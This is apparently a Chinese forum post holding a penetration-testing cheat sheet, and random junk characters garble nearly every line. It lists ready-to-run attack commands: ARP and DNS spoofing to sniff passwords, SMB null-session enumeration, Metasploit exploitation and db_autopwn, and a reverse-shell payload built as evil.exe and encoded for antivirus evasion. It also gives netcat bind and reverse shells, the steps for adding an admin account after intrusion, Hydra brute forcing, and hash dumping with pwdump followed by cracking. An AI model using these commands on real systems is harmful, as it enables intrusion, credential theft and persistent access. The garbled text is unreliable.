whois 域名/ip 查看域名的详细信息。2 F3 e# _8 I& f# [7 d3 W- O2 n4 X v
+ _9 f0 b+ ^7 T1 H2 w/ J, t3 f
ping 域名/ip 测试本机到远端主机是否联通。/ D! b' ^) |# @% X( F0 L
2 b# X! R. ?" T6 M" N2 udig 域名/ip 查看域名解析的详细信息。( \! C- E0 F9 h! }0 i; G
. U/ A, b+ `1 `" O' Nhost -l 域名 dns服务器 传输zone。
8 s5 W+ ~7 U3 y j. F
* E- o6 A: P- h" p* k( _- ?扫描7 w: i5 j1 T6 A5 i/ M' d
S2 H/ |4 w: \' w5 q
nmap:. [+ i7 x+ h! L! h& j9 }; C
i) |* x( A" } w2 i |
-sS 半开扫描TCP和SYN扫描。
: T6 l$ F/ f8 @+ a* u3 h * U! i9 M) L8 h- B7 Z
-sT 完全TCP连接扫描。0 L8 m4 p8 E" k- c0 K; v
* U' b) p* W7 q- t-sU UDP扫描
- Z) c7 N# ]8 a" U, g 5 D: z$ x; F1 I5 m
-PS syn包探测(防火墙探测)
& J" f4 p$ P5 \$ m
$ M3 B! R& V3 Z" ]6 s, T& q# ?-PA ack包探测(防火墙探测)2 P# \* Z! [7 e9 D4 }* p. k
- u& W" w% s2 w4 i2 A8 |
-PN 不ping。
$ i. |( S; w. E9 Z; F+ J% | ) c* ~- z3 J. W: x% K
-n 不dns解析。' `3 _- t% w0 x7 X& S
2 D" C2 \7 r' ~4 H5 W
-A -O和-sV。3 l' X$ B8 J$ \' m8 X
7 r/ X: ~ e$ ?4 y; o-O 操作系统识别。& V8 [) _2 l0 y4 X" L x2 M) n
: p+ p4 \3 L4 I9 P7 k; Q) p8 u# ~, N
-sV 服务版本信息(banner)
6 N8 P, a7 ^( f# j' N # \' o$ R, p D! n
-p 端口扫描。
" @ @. p8 \0 A& f: e2 f t% z
( G2 f. N" d4 c. z0 k3 t1 P8 ]-T 设置时间级别(0-5)
3 F- b4 P2 `& u + C" v9 e, l; U/ x1 c5 b; y
-iL 导入扫描结果。( Q [6 g: B& @- l7 B
$ L5 `1 a: X* e2 X
-oG 输出扫描结果。. ^1 X9 u8 ~7 L
0 T1 d$ E) n# f% G. @ ' T+ S6 H) l& x4 O# I4 a2 Z
3 j3 Z! Z2 f5 }1 P操作系统识别:
& w: |! L. K M5 r! @) S / e" C6 r( D9 @ N5 D" x w! L
p0f -i eth0 -U -p 开启混杂模式。) @8 M! [# g' I8 t; w: s6 `% M; D
7 G: j- g/ W+ `- L" Bxprobe2 ip|域名 检测os。
8 ^9 Z5 r4 \4 t" x
( i1 ^. ^. Q+ `9 D- Qbanner获取:
2 |0 N: ]6 b5 J* D* O! c
# n; G4 t& E3 X; C# L) \nc ip port 检测端口是否打开。5 Q% b1 _1 P: o. \) _: y
% {& s, P: S; v" r4 B Btelnet ip port 检测端口是否打开。" J2 ^& U" a) E* V- l3 d/ T: X, `
9 ~- K' _+ [; q9 V1 r, ?( n. a# iwget ip 下载主页。
1 S: C( w4 K# L. ^6 p S
' D0 y8 I8 H% q; Tcat index.html | more 显示主页代码。' V' G9 O* M! |+ U8 N4 j/ l, P0 `
8 ^: C" \6 c- w2 k9 [q 退出。' ?" K1 B/ W9 z/ b/ O+ ~0 |$ H0 D8 s
: i( Y% Q/ w' F! ]4 ~
windows枚举
$ p1 H L) g) b5 V# }6 `9 n
4 Y$ a) y- A: `% hnmap -sS -p 139,445 ip 扫描windows。
; U; W g0 e1 q) {& P
: r" Y+ q; x, _$ U+ @% p. v6 hcd /pentest/enumeration/smb-enum 0 B+ \, A3 T0 |
) _/ b$ r& p! E3 E& ~nbtscan -f targetIP 检测netbios。7 D8 C d4 o0 ]4 H' P/ ]
8 C' y) c2 O: ^3 y. v$ w+ {smbgetserverinfo -i targetIP 扫描name,os,组。
) R. Y4 U! K6 z. z
! w n% P/ w$ s& y# K2 wsmbdumpusers -i targetIP 列出用户。+ B0 ` ^- R% g4 M4 \* Z5 a+ Q
. L, ] S* h1 {smbclient -L //targetIP 列出共享。
! G+ J+ T x" ~2 P/ y, t% A2 h1 g
' ]( [% j6 F. H( Q3 H2 K. f: Z使用windows:1 `) [8 u1 T" g) D( u% n
; D- n w2 Z& l: V' W) M2 s
net use \\ip\ipc$ "" /u:"" 开启空会话。; m7 A' Y5 P& c1 v+ S& d# m4 R9 o
' [5 A+ i2 Y" }; M. r2 H
net view \\ip 显示共享信息。/ a! t8 `& |" G3 B) c4 d2 l( {3 @
6 ^4 M0 n) e8 t# ^, c* C- _6 b+ csmbclient:
7 G. G" R7 C1 ]6 Q8 e
7 w4 @* \0 i u$ Rsmbclient -L hostName -I targetIP 枚举共享。: [$ k" V% F6 h" m
. ~' J$ O7 o7 t
smbclient -L hostName/share -U "" 用空用户连接。
. U' L E6 f8 H: B
! F2 B& p7 c bsmbclient -L hostName -I targetIP -U admin普通用户连接。
( F8 p& [; A8 x& ~/ U
7 w* l) Q; g5 I% E7 G4 Arpcclient: 6 N8 Q% E1 n' |. P( `, Y4 q; J+ z( P
( G& X1 w2 _* k8 n7 n; V* q
rpcclient targetIP -U “”打开一个空会话。
+ V2 o& f+ h2 L6 F5 c 1 e U; E1 j) A. J! d
netshareenum 枚举共享。
6 J1 p3 S) C/ U% \ 7 `; P7 r( F& h8 u. u
enumdomusers 枚举用户。: |: a) g- ]( @% k9 [2 V, I
. P4 p, r" F4 Y4 H1 g C7 W7 {lsaenumsid 枚举域SID。0 e3 M, R; g) w9 r) C$ L6 ?+ |
0 l3 e+ _' o# nqueryuser RID 查询用户信息。
7 ^$ e. b& N. T u% v% a7 _+ l
- ?' n, K0 a6 u0 k( c* q. ?createdomuser 创建用户访问。; r& O8 R6 k6 i7 h3 J% p) |
3 u' B* s3 {# OARP欺骗:, q s- u W8 ]% c, W* M* h7 C$ v" h
# _, W# m" Z9 X, `
ettercap:
6 a2 w- {8 }. M 4 u* }$ |9 P! W6 s9 [% G' h
nano /usr/local/etc/etter.conf配置文件7 D. m9 b5 ^* H+ b5 \
6 J6 U4 W: Z2 ZSniff > Unified sniffing > Network interface: eth0 > OK 设置抓包的网卡
+ D. c, f1 ?) @# M+ g: ?2 k }( p6 q
. x9 j, D! k. O( k+ M' a6 `Hosts > Scan for hosts (do this two times)扫描网段的主机
' b* D$ h) A# F, H6 A ! F7 q. k. Y, R. t% G* u. A+ x
Hosts > Hosts list 显示主机列表
& g. S3 d% J0 e, ~8 J$ z3 {
' Q7 v( n I$ P; S( |! H7 `7 _Select the default gateway > Add to Target 1 添加主机; m. M s" o8 X8 w, r- \4 l- J
" n$ c9 S4 E8 wSelect the target > Add to Target 2 添加主机
' \& ? ~- J1 d+ \ / e q0 y/ H) {8 i) j& }
Mitm > Arp poisoning > Sniff remote connections > OK 设置ARP攻击% S* ~' {, [: _& A
; {: Y/ j! \7 Q* j8 z8 T _Start > Start sniffing 开始攻击
0 O% b* l/ F6 [' b+ f, J2 m/ R
+ X3 P$ d8 u& B! Cdsniff -i eth0 监听网卡窃听登录用户密码
4 n6 Q+ W7 |) x+ Q2 Z0 w) H8 F4 z8 P
+ `' ?2 l4 D2 ]0 ] v4 hurlsnarf -i eth0 嗅探http请求
4 P4 O6 M; M: k2 O0 f9 m * N$ `; I/ Q5 F
msgsnarf -i eth0 嗅探聊天软件的聊天内容
$ ^/ \; T! L. s3 ^4 O2 g
7 }; ^' r; O) u4 F Wdriftnet -i eth0 网络管理嗅探图片,音频。
. @; h& j9 i" e4 E, p3 [
9 P" m+ p) M& Qnano /usr/local/share/ettercap/etter.dns编辑配置文件
% F/ Z. G% F, Y* O$ U - n& T6 T$ _& L# B' |* y
Plugins > Manage the plugins > dns_spoof 设置dns欺骗6 W( {, S4 z5 R9 v, @, u
; {" T- j* M( ^! q" x0 j$ l) H! r; G% g8 yMitm > Arp poisoning > Sniff remote connections > OK 设置ARP- p5 I4 H& z$ Z; B; J0 U! W! S
2 C1 C3 {3 l$ e6 Y9 K9 d& AStart > Start sniffing 开始攻击
; V# ~" `/ J, U# V/ c / H( G" q: o1 w& q: l! Y8 f
1 {) z# i1 f- C+ [
- a1 j( G% Q$ q; _- BExploits漏洞利用:
8 X! j4 \- V A9 Z3 K G( G
- @8 @5 I; D6 {% w; Q' L6 ^cd /pentest/exploits/exploit-db 进入目录
4 D. G. O, E- I7 F6 G+ b8 F1 h& b% H
O5 m) w) e |cat sploitlist.txt | grep -i [exploit] 查询需要的漏洞0 ^. Q" P) W. J
! y. s" \% j0 k: l& c* ]cat exploit | grep "#include"检查运行环境$ O: D h& `4 |7 j
- ^1 r. v9 O# I* H* T, y$ }
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u只保留可以在linux下运行的代码- r+ ?* W j( v" W7 h
/ b5 Z: B" p6 A1 v; j4 k
$ I9 `7 U I& Y+ l3 T
! y, f. z7 h# s: s( f3 N
Metasploit:
5 S2 l. L8 i- ~ J+ F* d7 p1 X6 j# V' N
svn update 升级
) R4 W _( M) R" D5 R& j- D
' T+ O/ i% ~) h: ]! H. G& Z./msfweb Web接口127.0.0.1:55555。.
8 ^7 ~5 H0 N3 i/ l# D# P
' [0 y: ]1 \. B! r' r9 s./msfconsole 字符下的Console。
7 C* a( `0 P7 R* i
' z7 k& A* B' I5 i) f& W! \; ehelp 帮助. M; F5 ^" F! K: J% _! d: l( P x
6 F; e" H' A1 u8 ]& \; b9 d8 u) k: G
show <option> 显示选项7 L! U) G2 p( ^ x6 Y& S$ m
" W V9 f ~% d" l# i# usearch <name> 搜索名字
; F$ j# j9 C3 ^+ a; E; Q ( ]- i/ N* F( S8 p5 [
use <exploit name> 使用漏洞
# o L, H% K! N+ d# Z! ~3 c& b : J' g# E7 Z9 {, v1 R
show options 显示选项
7 L6 i! h: j- U4 j
I! o" a$ c& B- r+ R) r0 ^set <OPTION NAME> <option> 设置选项
' n& d. Q6 N6 g+ i
' i$ Y0 E/ j' a9 i2 Q, R3 Y: Fshow payloads 显示装置7 `0 j- w2 ?2 w# X+ @
4 B; U" g$ P& O
set PAYLOAD <payload name> 设置装置, a2 V: b) d. a; M) Q% ~$ l
: m* s4 n1 Z' s/ |& [; yshow options 显示选项
6 X, b5 O* y' ]9 t * l# | D c$ w' x
set <OPTION NAME> <option> 设置选项( w* r; l( [7 x3 T: b* J! r
% l7 e& {* A: k4 \( C x, z% E, u
show targets 显示目标(os版本)
: @$ d+ V# r1 o: o) N
' @! V; o& M5 X9 N9 ]5 v: fset TARGET <target number> 设置目标版本* N, ~4 i1 n' |7 ]2 o, ]
' C# Y6 g6 Z2 q9 c; lexploit 开始漏洞攻击* g; q1 S) x% k! x* \3 H# Q7 y/ e; E
+ t2 W$ ?' _% x! V9 T8 f
sessions -l 列出会话
' F7 f9 D( y6 J7 |8 q" E 4 K: K* E8 r5 m5 t+ \
sessions -i <ID> 选择会话
- I8 r5 q0 R; v( T! l- L) ]! |
9 S: z" S' E. D7 m, X9 R; p6 U8 A! Usessions -k <ID> 结束会话5 N# A! Q _1 X0 B
1 n- d5 }" i E$ H2 x) d<ctrl> z 把会话放到后台
d. D* S6 N h0 E+ V 2 A% I5 y, z# b( n, S( g8 B
<ctrl> c 结束会话+ V+ u; n! h. G$ I: S
% ^8 U: y9 A" ^- a* w% n" m! zjobs 列出漏洞运行工作
9 ~/ d- ^) L7 ?( c& Z , S) A9 N- A* a. ^
jobs -K 结束一个漏洞运行工作
8 k, c; ^" x7 }% r5 `% e% @ . D- L! n8 m' R% q! e4 c% j8 W4 k
show auxiliary 显示辅助模块0 ^3 k+ j3 m2 Q
' P1 ?) K* k9 t- j1 q6 W7 [use <auxiliary name> 使用辅助模块) @" i; }* ]4 g
+ B8 u! G7 b e5 @& a4 n
set <OPTION NAME> <option> 设置选项( |1 I! q% {, K, P
% x, f! D* W, C- {0 e: z- hrun 运行模块
P1 b+ a+ ~9 E6 T2 n j5 I& z2 b
" {7 }. L! W, q% q/ \7 ]5 gscanner/smb/version 扫描系统版本
+ h2 _( m! q# p* O5 k 9 [, r. F# M# t" z x9 f
scanner/mssql/mssql_ping 测试mssql是否在线2 T2 Q2 [ G0 k" R
9 o2 b3 B( A3 @! [+ _' Y$ fscanner/mssql/mssql_login 测试登录(暴力或字典); @+ }) w8 X% t7 X
$ G: q: _7 S" B, h5 V2 Q: MAttacker behind firewall: bind shell正向* H! n7 O5 x2 P7 a" q6 B9 ^* @
& a0 l' B3 m9 k/ O4 v L
Target behind firewall: reverse shell反向
$ M0 |# A* H' c# }- p$ T
3 B* n& M* a3 ?4 M! i, LMeterpreter衔接不懂dos的可以用这个:/ D: e! T4 B q/ w$ i# i+ p
0 k* K# }; \; l+ X9 u R6 G
db_import_nessus_nbe 加载nessus的扫描结果
& ~! f& r0 S; q- n5 m* n2 i- _$ @
# S" N! T( B- j# s! [9 j& z( hdb_import_nmap_xml 加载nmap的扫描结果
9 I, z# L5 w! P4 S& ?1 q1 [$ _
0 k- @6 P( S/ f% F自动化攻击流程:4 E+ e" P5 m6 q! `
2 B8 ?* f1 X3 r4 S* `
cd /pentest/exploit/framework3
6 z! O: Q: {% ~+ ~! L1 B3 l
5 Z$ j! ` s, b2 g) q./msfconsole% E1 }+ u& L3 ]# o' @! w
0 u+ o+ M2 C. v$ k9 r
load db_sqlite3& ]9 j+ D3 s7 T1 D! `3 A
$ w5 x/ L) N* s# I7 I3 }db_destroy pentest
( v3 Z# C& C: D7 O E0 ~6 p9 O : z% f, J0 z9 L- i" J, I
db_create pentest
+ W6 H. c$ X1 l0 C+ S( z! v4 S % F; S% W+ }: Q0 v8 [
db_nmap targetIP# v3 A2 [: ]' l6 V% I; w2 m( z
7 Z2 C5 W5 n$ C' \5 k, i) o. v7 W( Ddb_hosts# y1 j0 X- h: G1 c2 P0 T
5 {# O$ m4 `4 d6 tdb_services0 p" v# `) D5 L- ]
# Q7 x; M. R! Bdb_autopwn -t -p -e c- X- f1 G, E
a) y; G4 s4 e! C
字符接口攻击流程:
3 K, U" G' D& u2 T" K. g 9 F7 e0 |$ m2 {+ [; u
./msfcli | grep -i <name>
: ~2 o; }$ e& | {& z& V- l 9 s2 I9 J5 H# K' w
./msfcli <exploit or auxiliary> S; o$ ?. j5 T- i
2 ?( J, i! M1 s- y4 T6 g" U$ g./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E
. T/ d0 ~( P. d3 i1 J 9 w. t2 W& n* [4 T
做木马后门等:
( K6 ]3 _$ b- D* [3 o
# ^ A" E! e8 }6 t1 ^3 f* t./msfpayload <payload> <variable=value> <output type>/ Y# U, J! M, ]! X1 ~
/ R2 ?. i2 }" F: R8 q- D4 g3 A
S summary and options of payload2 o6 R! D0 w. G) C8 s
9 A( m+ C: c$ u3 ^/ HC C language
. e- H% m( B6 w4 C% x( b
7 J" s% o, x4 h8 eP Perl5 h1 h+ b3 y' T3 s% _ J
& ?; L: k( I1 [: T
y Ruby+ ]; a \6 u3 U x( [
9 f* W& K: A- B$ OR Raw, allows payload to be piped into msfencode and other tools
2 k; B- k# e* e2 I Y7 r. Z
# ^& h' F" J/ Y4 A5 OJ JavaScript
* d3 r: d* W& a0 `- j. }" M- [
6 r& {( G: B4 rX Windows executable- k2 u* _8 q" S: c
1 K; Y4 C! n6 z
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
: T( i2 q/ R- T9 C% G & T, Y6 u" s& x$ `4 c
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe
+ B, D. Y& v6 s5 W& z, o9 G % i P+ j" G% D* U2 W$ l
编码处理就是做免杀:3 S t% H5 H- A0 q& a2 w
1 ?2 O% ]7 U H0 t& g& B
./msfencode <options> <variable=value>
1 V P9 s4 \2 j1 C5 d ' w' Y3 N1 s- l! l
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -l: U+ a( T* ~! ]! x: _
+ @9 S" z0 p% W& p
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -e PexFnstenvMor -t c
@* ?, [ x& B* q8 M
' {, _/ c: h# J& q7 n4 b0 N 8 O3 L! z, N! `8 p3 t. {/ C
) e& m* }# n' I5 l8 y5 t% W4 [
入侵后在windows下添加管理员用户:* w5 k8 c. R" V1 A1 i) s3 _
& @9 B' v# V" |hostname 查看主机名# ]: `, v, M2 `- ^- U' `
3 a* `8 {+ E) C2 [0 \1 n, onet users 查看用户 O2 |* O! E% V! e0 X% y. e- l
- M+ L. C7 E4 ?4 W) f/ r! d
net user 用户 密码 /add 添加用户
7 Q( W, |& _0 U3 h: }( W 9 c( p8 ^9 h! l, d) v
net localgroup 查看工作组2 F% x( z- U) K6 D4 u( x! w
# |( G3 Y9 k) D* b
net localgroup administrators 查看管理员组
( a A4 Z' R+ x# Y9 O1 E. `
+ Q: {$ G @' j; znet localgroup administrators x /add 将用户加入管理员组
, f9 V% S4 L: E" S8 s5 J
9 n4 U$ H. f# J7 [8 k 5 F0 n+ t+ N; ?( j- d7 w! ~
/ I0 C) _4 m9 j* GTFTP6 I. w5 @! {, S# {1 `
7 e8 |4 C- p! b* \& ]- f: O; V+ @
cp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上
; w4 t6 H/ m( F3 C* J
! [ Y7 w; |) dtftp -i 10.1.1.2 GET nc.exe下载7 A3 K7 B8 [& n/ V, h8 d. g) {
4 ]4 F& H7 z6 t: [ V2 w1 j9 }( ]netcat瑞士军刀% G3 [$ H" N! h
q* @% C7 b, D4 n( |# T# Sattacker: 10.1.1.1 / M" D0 D3 n: ?/ b. p6 B: s
+ x+ l/ x" m- V2 V
target: 10.1.1.2
t" N* G$ k# ^' v) A
0 B% s6 v; t6 D1 R4 Tnc -v -z 10.1.1.2 1-1024 端口扫描/ @/ D, ~, P% Y1 N2 D
* ?3 W& i* c$ b3 W. B* etarget: nc -lvp 4444 聊天设置(服务)2 Q# D1 ^7 }+ ?6 V/ Z, X4 d
( J( e+ U, ]; N
attacker: nc -v 10.1.1.2 4444 聊天设置(客户)
: e3 }: |! w! @: t9 a
, m j/ N( J4 c6 Jtarget: nc -lvp 4444 > output.txt传输文件(接受)4 ~0 T" ?' Q8 W( V
9 X) w8 e' R3 ^/ D" G
attacker: nc -v 10.1.1.2 4444 < test.txt传输文件(发送)- s0 z- I6 y/ v0 t+ n
+ d0 K8 b/ l5 g- E9 Z; b
target: nc -lvp 4444 -e cmd.exe Bind shell。- V8 U/ y) D3 S/ D" ?; q5 p
& f4 h7 U' _8 _ F/ `# H2 |attacker: nc -v 10.1.1.2 44443 d/ b5 |% M- H0 [! C( f/ }
7 e" ~" ~' n0 \ r+ A0 g R- @
target:nc -lvp 4444 Reverse shell。
* P3 W+ S0 [: ^, A
4 o' `+ A) c/ S% nattacker:nc -v 10.1.1.2 4444 -e /bin/bash
3 k- \9 p% w D+ q0 r
$ O7 p8 P( b Q : M( ~ R/ F3 `3 ?7 v G1 V; p& n
: o, g+ k, {/ H1 l; v密码/ J# n; w9 A0 K1 a+ _( k7 c O7 j
% l, Q9 k, ~" g/ G& M+ \0 z) A& z) D字典zcat /pentest/password/dictionaries/wordlist.txt.Z > words
4 M9 f1 I# w* k' o2 J$ l / G/ g; H7 D1 A' [, ~9 J$ l6 z- Y
cat words | wc -l显示个数(30多万个) / v7 I' x& s7 |5 t& X! K$ v
) s* h3 I! a5 l! @
暴力:
( o5 X: [! U! |$ \
2 D3 @& O8 @& e) S$ x- e# T6 Khydra -l ftp -P words -v targetIP ftp 攻击ftp。) F9 R) m' N& J2 _
( {" o% [5 `; y7 B
hydra -l muts -P words -v targetIP pop3 攻击pop3! J. d( z* z$ D. d7 o- S5 [& v
* n# k. r- p8 [: ?# r! Rhydra -P words -v targetIP snmp 攻击snmp
2 D& J4 K4 t0 e/ S/ V1 Y
8 V& @. N3 N- k- P攻击microsof VPN
' m* m+ Y; L6 _ m* V) r- P
6 F5 ]0 C. |2 }/ z$ I% { Nnmap -p 1723 targetIP# {+ W8 `% x# [, z7 j
8 C6 ]/ G% S) \( N( qdos2unix words8 b5 x0 e/ Q3 [0 x
( s: s# \$ k, g4 Z0 ~, U0 Z5 p; g9 `
cat words | thc-pptp-bruter targetIP
. D' x h8 C" [: n- D . @* M; b. K8 Y# X2 L8 l
WYD:5 [, g9 @; J' t5 Z$ u* q
/ t, @& s: M5 j" M! A4 l$ R
wget -r www.target.com --accept=pdf 下载pdf文档
' Q/ D& L% f" @/ l+ K, n
2 M# }3 ~" H2 X% N$ Uwyd.pl -o output.txt www.target.com/' U- d2 @$ B- R7 ]; E
) u( R# l, t3 h4 `cat output.txt | more3 f \$ J/ E- r( ?( O
' M6 t: i- b D& n, x7 QSAM文件(windows下的密码文件):+ f2 Z5 |$ k; G, s; B; K1 Q
* X0 x) A) x1 T6 J, K5 X5 l5 i%SYSTEMROOT%/system32/config2 W6 N H' p) a" r; w4 r& w% g
5 Z/ {. p. d* k/ K%SYSTEMROOT%/repair
9 r* ^; C( F7 c0 k
+ L; d7 K% C1 `+ b+ d( u备份windows的hash文件:2 _ r1 m( @+ N1 ^
3 l4 q! n. v7 Q( D5 l
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
! I3 z2 g/ a+ [2 H ; b9 o/ \1 z& d% ]' B r4 L
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\0 N1 J& d9 w( ?( Q# J4 p
, m4 W- |6 M/ t4 m6 C; `$ D
meterpreter > execute -f cmd -c
7 V7 ^/ {5 H$ Y# x x. N6 p$ S, a * I; |. @- ~/ G# S
meterpreter > interact x
# @# O/ g. k4 K, w 1 }& u) t2 m6 z' {# ?
C:\WINDOWS\system32> pwdump \\127.0.0.1' A) i5 B8 D9 E+ ?, B$ {0 y
) k4 N$ b9 B$ O9 Q+ m9 zjohn破解密码:$ g! Q- C6 j' y3 n2 c# ^
2 K& x6 ?& n" [
cp hash.txt /pentest/password/john-1.7.2/run/
8 N& |6 s& |$ a* i: L; ~
) G' X2 N) ?# \& S/ @cd /pentest/password/john-1.7.2/run/
. X* l/ ^% k, a& f, S5 a # a7 H1 R" V7 Z+ h( V% P+ n" W; b3 Q
./john hash.txt, O6 l ~5 s) v6 J4 A+ \( I+ S! N
* x2 a3 q; a! L7 e0 ?" b( @# a彩虹表:
q% ~; p+ C2 p: }7 `6 o x ( ]) F; `; T" T9 Q b2 c; w; U
rcrack *.rt -f hash.txt
7 f1 K' `* w, e& ^' f( c
% n) r* u2 L) {' _* H6 p9 r / G( b+ r$ Z }. G
# g ?( [3 b9 N" X
本地修改密码:& C4 |5 Y F1 ^ E
% Y. m; o: d( ~) J
mount
! s7 G" k: H3 E2 U J1 S0 S
9 ~8 U$ \# u- \9 numount /mnt/hda1$ f) |9 |- M8 N
# Y, k- k1 h8 e# l, J0 b% y
modprobe fuse& [; E; a6 r0 Q# x v6 Y9 N7 {
1 i B) \- V! v% m
ntfsmount /dev/hda1 /mnt/hda1
' x; @, @+ K% K# H3 w, P ' o$ R, O% \( y; P; F
mount |
|
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
# D4 W0 I: T) ]& c3 a8 P
